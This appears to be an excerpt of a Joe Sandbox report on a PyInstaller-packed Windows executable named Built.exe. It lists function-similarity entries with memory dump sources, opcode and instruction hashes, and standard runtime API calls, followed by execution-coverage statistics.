                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: Value
                                                              • String ID:
                                                              • API String ID: 3702945584-0
                                                              • Opcode ID: e370891a427e995cf622d6c66c6ae617f18e5219a23357883517039299fedc16
                                                              • Instruction ID: 4f693b279e088b5053dbb626147a3c339ff2ec3b725095acc2c66729fd840cac
                                                              • Opcode Fuzzy Hash: e370891a427e995cf622d6c66c6ae617f18e5219a23357883517039299fedc16
                                                              • Instruction Fuzzy Hash: 50117F60A0C60345FE68A7219E631796142BF847B0F588335E93DCA6DBDE2EE441AF03
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: Value
                                                              • String ID:
                                                              • API String ID: 3702945584-0
                                                              • Opcode ID: e449caa10890978289f0fc2f631dee428fb70040431ae2bf3103bb36de88fb08
                                                              • Instruction ID: c9919ac2db97eb4bc1be2fd7a4628661d93e76f95d8e961aa834a1a8815db9f3
                                                              • Opcode Fuzzy Hash: e449caa10890978289f0fc2f631dee428fb70040431ae2bf3103bb36de88fb08
                                                              • Instruction Fuzzy Hash: 4B110360A0820786FE69A3614C6327A1142BF45370F584734D93EDA2C3DE2FB805AF93
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: verbose
                                                              • API String ID: 3215553584-579935070
                                                              • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                              • Instruction ID: dcc7626ceb969f4791abe236f85fde07e64d22b0293a6971aba1858fd95382af
                                                              • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                              • Instruction Fuzzy Hash: 9891AF32A08A4641FF618E29DC5237D3291BB44B94F644136DA4AC33E7DE3EE445EB43
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                              • API String ID: 3215553584-1196891531
                                                              • Opcode ID: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                              • Instruction ID: 18a349483acf42ec169e6105a05702d57b502b0b67f55302b880493ff16e8da4
                                                              • Opcode Fuzzy Hash: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                              • Instruction Fuzzy Hash: 6C81AF32E082829DFFA45E25891227936A0FB11B48F558135DA09D769BDF3FE901BF03
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                              • String ID: csm
                                                              • API String ID: 2395640692-1018135373
                                                              • Opcode ID: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                              • Instruction ID: 0f901787a06be744a7c178693a72e106887a6fa72cc5c19755e2968ed663cd31
                                                              • Opcode Fuzzy Hash: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                              • Instruction Fuzzy Hash: 8F51AF32F196029AEF24CB15E864A796791FB44B98F104131DA4E877C8DFBEE841DB02
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: CallEncodePointerTranslator
                                                              • String ID: MOC$RCC
                                                              • API String ID: 3544855599-2084237596
                                                              • Opcode ID: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                              • Instruction ID: 3ea4b310dadff013d513bc01293433b36559e9295327901e133b30c67d27607d
                                                              • Opcode Fuzzy Hash: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                              • Instruction Fuzzy Hash: 6661BE72908BC585EB309B15E8503AAB7A0FBC5B88F044235EB9C43B95CFBDD190CB42
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                              • String ID: csm$csm
                                                              • API String ID: 3896166516-3733052814
                                                              • Opcode ID: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                              • Instruction ID: 48e96f77dab55167929b669b7d6553ea229c55d619ebfb299d2cc947fa23bb9d
                                                              • Opcode Fuzzy Hash: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                              • Instruction Fuzzy Hash: 865181329082828EEF748E21996436836A0FB95B94F149135DA5C87795CFBEE850DF43
                                                              APIs
                                                              • CreateDirectoryW.KERNEL32(00000000,?,00007FF62664352C,?,00000000,00007FF626643F23), ref: 00007FF626647F22
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectory
                                                              • String ID: %.*s$%s%c$\
                                                              • API String ID: 4241100979-1685191245
                                                              • Opcode ID: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
                                                              • Instruction ID: 540cced50a328dd1f20bb940f2d3fe54eabee7226bfb0d1752e4e80dd14acea4
                                                              • Opcode Fuzzy Hash: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
                                                              • Instruction Fuzzy Hash: 0E31D421719AC245EE718B21EC603EA6364FF94BE4F040231EA6D87BC9DF6DD6059F02
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: Message
                                                              • String ID: ERROR$Error$[PYI-%d:%ls]
                                                              • API String ID: 2030045667-255084403
                                                              • Opcode ID: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                              • Instruction ID: bdd7f91bfeed5a8977b4cfee13161e5ebdae5eaf08ae7c9fc98273865e83f8d3
                                                              • Opcode Fuzzy Hash: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                              • Instruction Fuzzy Hash: 1A21D372708B4292EB20DB14F8447EA7364FB88780F400132EA8D97756DF3DD259DB42
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: FileWrite$ConsoleErrorLastOutput
                                                              • String ID:
                                                              • API String ID: 2718003287-0
                                                              • Opcode ID: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                              • Instruction ID: 77261c2cbaf06afefafb77863e4951acd1de37324186b6549721a396861f4a6c
                                                              • Opcode Fuzzy Hash: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                              • Instruction Fuzzy Hash: ECD12772B18A81CAEF10CF65D8401AC3B72FB45798F048239DE5D97B8ADE39D016DB42
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: _get_daylight$_isindst
                                                              • String ID:
                                                              • API String ID: 4170891091-0
                                                              • Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                              • Instruction ID: 614e647a57ed7aa687d5cf7d64855e2decccac492ccd7bb54dd9c1051a4f11c6
                                                              • Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                              • Instruction Fuzzy Hash: 8A51E472F082128AEF24DF249D566BC27A5FB50358F500135DE1ED2AE6DF3AA4019F03
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                              • String ID:
                                                              • API String ID: 2780335769-0
                                                              • Opcode ID: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
                                                              • Instruction ID: ac2fc6da97adcbe52dcd2b1ec6b1ed622f2d1fdc720641d3268b5036b9825285
                                                              • Opcode Fuzzy Hash: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
                                                              • Instruction Fuzzy Hash: 6451BC62E186828AFF10DFB1D8553BD23A1BB48B58F144435DE0D9B68ADF3DD450AB43
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: LongWindow$DialogInvalidateRect
                                                              • String ID:
                                                              • API String ID: 1956198572-0
                                                              • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                              • Instruction ID: d86fb4ccf68ccb054c457f0c74111a0236675593fdd9ef4bc345d6e5123cef19
                                                              • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                              • Instruction Fuzzy Hash: 8911E921A0C14382FE64876AFD9427A5296FB84780F544030DB4987B8DCDAFD491AB03
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: _get_daylight$_invalid_parameter_noinfo
                                                              • String ID: ?
                                                              • API String ID: 1286766494-1684325040
                                                              • Opcode ID: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
                                                              • Instruction ID: 37800e8361a3dfe703810459f1b1267ab54125d95f0b7731b7bdae98e5dc0b6c
                                                              • Opcode Fuzzy Hash: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
                                                              • Instruction Fuzzy Hash: 55411922A1868345FF249B25F8423796660FB80BA4F144239EF5D86AD5DE3ED441DF03
                                                              APIs
                                                              • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6266590B6
                                                                • Part of subcall function 00007FF62665A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF626662D92,?,?,?,00007FF626662DCF,?,?,00000000,00007FF626663295,?,?,?,00007FF6266631C7), ref: 00007FF62665A9CE
                                                                • Part of subcall function 00007FF62665A9B8: GetLastError.KERNEL32(?,?,?,00007FF626662D92,?,?,?,00007FF626662DCF,?,?,00000000,00007FF626663295,?,?,?,00007FF6266631C7), ref: 00007FF62665A9D8
                                                              • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF62664CC15), ref: 00007FF6266590D4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                              • String ID: C:\Users\user\AppData\Local\Temp\Built.exe
                                                              • API String ID: 3580290477-3074098987
                                                              • Opcode ID: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
                                                              • Instruction ID: c4784340ecc49216068ea27e7b8f106d7242c23d749b736892174fab2a9ed293
                                                              • Opcode Fuzzy Hash: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
                                                              • Instruction Fuzzy Hash: 5E41BF32A08B6285EF149F25EC821BC27A8FB457C4F454135E94D83B96DE3FE4859B43
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastWrite
                                                              • String ID: U
                                                              • API String ID: 442123175-4171548499
                                                              • Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                              • Instruction ID: 9dd750388ea1ae7e9e0c287f08b9ac49db762c15d189c90301a240ffe146a3b8
                                                              • Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                              • Instruction Fuzzy Hash: 3941A032B18A82C2DB208F25E8453A9A7A1FB88794F404135EA4DC7B99EF3DD401DB42
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectory
                                                              • String ID: :
                                                              • API String ID: 1611563598-336475711
                                                              • Opcode ID: d6dc5ef3b9a701496246f0bbbe5215094a09db29d56a445c076fb19df1080212
                                                              • Instruction ID: dc68054cd116e748200abaed3056cc6a73184f056bcf99fd2a0917b809896555
                                                              • Opcode Fuzzy Hash: d6dc5ef3b9a701496246f0bbbe5215094a09db29d56a445c076fb19df1080212
                                                              • Instruction Fuzzy Hash: D821E472A0838286FF209B16D84526E73B1FB84B44F954035DA8C83696DF7EE945DF43
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFileHeaderRaise
                                                              • String ID: csm
                                                              • API String ID: 2573137834-1018135373
                                                              • Opcode ID: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                              • Instruction ID: 9f2f6502ed7a1bbb3ad87a2f64282b53d1245c60ec3d8c94ba26d750ce038211
                                                              • Opcode Fuzzy Hash: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                              • Instruction Fuzzy Hash: 25113D32618B8282EB618F15F85026AB7E5FB88B84F584230DF8D47769DF7DD551CB01
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: DriveType_invalid_parameter_noinfo
                                                              • String ID: :
                                                              • API String ID: 2595371189-336475711
                                                              • Opcode ID: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                              • Instruction ID: 67339ac808a419b7276d4cba451acde03c84c3de1b5988d905cdff8cbac04b00
                                                              • Opcode Fuzzy Hash: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                              • Instruction Fuzzy Hash: 4B01442291C28385FF209F60A8662BE77A0FF85748F840036D54DC6691DF2EE554EF17

                                                              Execution Graph

                                                              Execution Coverage:2.3%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:1.1%
                                                              Total number of Nodes:737
                                                              Total number of Limit Nodes:32
